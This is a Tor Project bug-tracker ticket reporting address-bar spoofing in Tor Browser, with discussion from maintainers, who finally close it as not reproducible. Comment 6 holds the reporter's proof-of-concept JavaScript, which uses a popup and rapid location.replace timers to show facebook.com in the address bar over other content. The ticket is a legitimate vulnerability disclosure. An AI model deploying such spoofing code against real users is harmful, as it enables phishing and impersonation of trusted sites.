Opened 3 years ago

Closed 14 months ago

#20679 closed defect (worksforme)

Tor Bowser Address Spoofing.

Reported by: Dhiraj_Mishra Owned by: tbb-team
Priority: Medium Milestone:
Component: Applications/Tor Browser Version:
Severity: Normal Keywords: tbb-crash
Cc: Actual Points:
Parent ID: Points:
Reviewer: Sponsor:

Description

Steps to reproduce the problem:
Please find the attachment.

  1. Open http://hackies.in/spoof.html
  2. Hit Go.
  3. The Address Bar gets spoofed.

Address Spoofing:

Address bar says facebook.com
Content is not facebook.com

However by closing the spoofed tab the browser crashed.
In my attempts to repro, the page always goes blank after a short delay, both on Linux and Windows. I'm sure that it's possible to tweak the parameters to DoS the browser and delay the blank paint, but that's fragile and is unlikely to work well across machines.

The timer setTimeout() is actually set to 4 seconds. Locally, the spoofed content gets displayed for the time mention in the code (Time value van be extended) to make the spoof page stable.

Demo URL : http://hackies.in/spoof.html
Please find the attachment for the reference.

Thank you

Child Tickets

Attachments (1)

TOR.ZIP (119.5 KB) - added by Dhiraj_Mishra 3 years ago.
POC

Download all attachments as: .zip

Change History (8)

Changed 3 years ago by Dhiraj_Mishra

Attachment: TOR.ZIP added

POC

comment:1 Changed 3 years ago by arma

Component: - Select a componentApplications/Tor Browser
Owner: set to tbb-team
Severity: MajorNormal

comment:2 Changed 3 years ago by cypherpunks

Keywords: tbb-crash added; Tor Browser removed

OOM

comment:3 Changed 3 years ago by Dhiraj_Mishra

Hi Team ,

Any follow-Up , Please let me know about the Issue.
Looking forward to it.

Thank you

comment:4 Changed 3 years ago by Dhiraj_Mishra

Hi ,

Attaching reference , Mozilla is tracking the issue :

https://bugzilla.mozilla.org/show_bug.cgi?id=1317573

Thank you

comment:5 Changed 14 months ago by traumschule

Status: newneeds_information

I can't reproduce it, the site is down. Do you have another example?

comment:6 Changed 14 months ago by Dhiraj

Sure, open spoof.html

# spoof.html

<script>
function next()
{

w.location.replace('http://www.facebook.com/index.php?'+n);n++;
setTimeout("next();",15);
setTimeout("next();",25);

}
function f()
{

w=window.open("content.html","_blank","width=500 height=500");
i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);

}
</script>
<a href="#" onclick="f()">Welcome to Facebook.</a><br>

# content.html

<b>content.html</b>
<script>location="http://www.facebook.com/index.php?";</script>

comment:7 Changed 14 months ago by traumschule

Resolution: worksforme
Status: needs_informationclosed

Thanks for the fast reply! Please try it out with 8.0.2 yourself. I downloaded and extracted the archive, opened spoof.html with "Standard" settings (js enabled) and clicked "Go". The only thing i see in the console/log is:

JavaScript error: resource://gre/modules/WebRequestContent.js, line 118: TypeError: window is undefined
Note: See TracTickets for help on using tickets.